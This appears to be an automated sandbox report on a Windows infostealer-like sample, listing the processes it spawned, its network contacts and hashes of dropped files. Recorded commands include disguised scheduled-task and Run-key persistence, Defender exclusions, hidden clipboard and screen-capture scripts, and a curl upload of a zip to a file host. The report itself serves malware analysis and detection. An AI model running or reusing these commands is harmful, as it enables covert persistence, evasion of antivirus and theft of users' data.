C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jsxxoqjq\jsxxoqjq.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4508.tmp" "c:\Users\Admin\AppData\Local\Temp\jsxxoqjq\CSC5E3344A173974038A1E0272D1BF8B215.TMP"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\stub.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Llxdhewc.zip";"

C:\Windows\system32\curl.exe

curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Llxdhewc.zip";

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
BE 2.17.107.131:443 www.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 discordapp.com udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 131.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 162.159.130.233:443 discordapp.com tcp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 104.26.12.205:80 api.ipify.org tcp
BE 2.17.107.131:443 www.bing.com tcp
US 104.26.12.205:80 api.ipify.org tcp
US 104.26.12.205:80 api.ipify.org tcp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 api.filedoge.com udp
DE 49.13.193.134:443 api.filedoge.com tcp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 134.193.13.49.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 www.myexternalip.com udp
US 34.117.118.44:443 www.myexternalip.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 mrbfederali.cam udp
US 8.8.8.8:53 44.118.117.34.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 104.21.93.60:443 mrbfederali.cam tcp
US 104.21.93.60:80 mrbfederali.cam tcp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 60.93.21.104.in-addr.arpa udp
US 162.159.130.233:443 discordapp.com tcp
US 104.26.12.205:80 api.ipify.org tcp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 104.26.12.205:80 api.ipify.org tcp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 3.166.122.92.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

MD5 66a65322c9d362a23cf3d3f7735d5430
SHA1 ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA512 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

C:\Users\Admin\AppData\Local\Temp\temp.ps1

MD5 18047e197c6820559730d01035b2955a
SHA1 277179be54bba04c0863aebd496f53b129d47464
SHA256 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
SHA512 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

memory/1656-72-0x00007FFB53753000-0x00007FFB53755000-memory.dmp

memory/1656-73-0x0000023CD34E0000-0x0000023CD3502000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4kvqwc2l.e23.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1656-83-0x00007FFB53750000-0x00007FFB54211000-memory.dmp

memory/1656-84-0x00007FFB53750000-0x00007FFB54211000-memory.dmp

memory/1656-85-0x0000023CED890000-0x0000023CED8D4000-memory.dmp

memory/1656-86-0x0000023CEDCB0000-0x0000023CEDD26000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\olkgg0ws\olkgg0ws.cmdline

MD5 482e85c9cc35422c673a767724a45df9
SHA1 8cf747c5a1bab551ec992bab4af9e5998d04ae46
SHA256 192f3954d0c131fb98cbc5866fa6c5056e4e535d0f4a5b7a5b69b2a60b43ec30
SHA512 8411338e58046e151c2d4eb05874436895aba211988fdebfd9aa4301e3e6ec1637c0c8b4137e61a6922dd5c4b94d47d3338816e81fb8521022042a0146fcb199

\??\c:\Users\Admin\AppData\Local\Temp\olkgg0ws\olkgg0ws.0.cs

MD5 7bc8de6ac8041186ed68c07205656943
SHA1 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA256 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA512 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

\??\c:\Users\Admin\AppData\Local\Temp\olkgg0ws\CSCE254F21150E64C2A87A95ADCE1CA8C.TMP

MD5 f47f74f1c02038b80f67e4cdf6af32e9
SHA1 c527c16248a282dfe9d69f6bcf1180d8830b04d3
SHA256 3513ec1916e320c459edd001176cb9b6f9892ddb36b720c8ca272b4bd621e320
SHA512 1d212510ff42c87a04376b6b4aeef55d7d8ecb290e953bbeb496e14041b831f1216b3d4c58e76578e848cd217bcb38a627b26ab16c27f999c329131cd177d185

C:\Users\Admin\AppData\Local\Temp\RES3CF9.tmp

MD5 05b527e109aba780f3e6c0ede3fe43c6
SHA1 1a435724c132d2ea0b35c0d634835f8ecdf4a8ff
SHA256 937b977f49e998a10a8f14e0d3b9eb8a0bd3353b841ba822d94de0ce4eb6211d
SHA512 07fdb15ae6150f59c8e88a6533dd4f39dfadb2866e5912880bd7ca9900da7b12e6e4606e3edea0066689a445544bdb2c59fa35fcddd0bd2f8a7490e5efbe6e1a

memory/1656-99-0x0000023CED860000-0x0000023CED868000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\olkgg0ws\olkgg0ws.dll

MD5 5cb06aa13c5d736472e04b2cd5b7929d
SHA1 e71870e1f00db4ca61990609c49f203b8e185eb3
SHA256 1035d1641dbb654b0cb7dc8c57a74b88e5c9e656fc7b89d40dce87dc7ba172bb
SHA512 faf5a57d030a77c5bda3652a0b65ccb1ac4a5e65e8e7b16b2299c36e74e52ef85906c491af2aea03958c1e3be221774fd9953f31917ae7c655c0437694e12812

memory/1656-103-0x00007FFB53750000-0x00007FFB54211000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3f01549ee3e4c18244797530b588dad9
SHA1 3e87863fc06995fe4b741357c68931221d6cc0b9
SHA256 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA512 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

memory/2556-115-0x000002723A220000-0x000002723A270000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1812c528169a46e922b94672409cf5b3
SHA1 1d1d1511b71097205a93214a1056db23141e727f
SHA256 83bd505ff36cd8dc93f84cf6688ce92f3c1ecbb04f75314f92d8c91417009a30
SHA512 b9113ee163cd4e1d64a217cb2a3eb6fccfd21a2d66e8c8cd95f91f29fc19da8b98aa4048cbcad6e2d67a4c3056be01c09674eedb7b60e97f6c8fd97d62b9d251

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5fcfa95543a7088c79ff4dd7ce6cd352
SHA1 5fc2045faf1c35ebf32907a4b8cf76874fd31f43
SHA256 e11655e31ad254ca1490f992e8044548acd1c0c19003bebfc8e41320e03aad8e
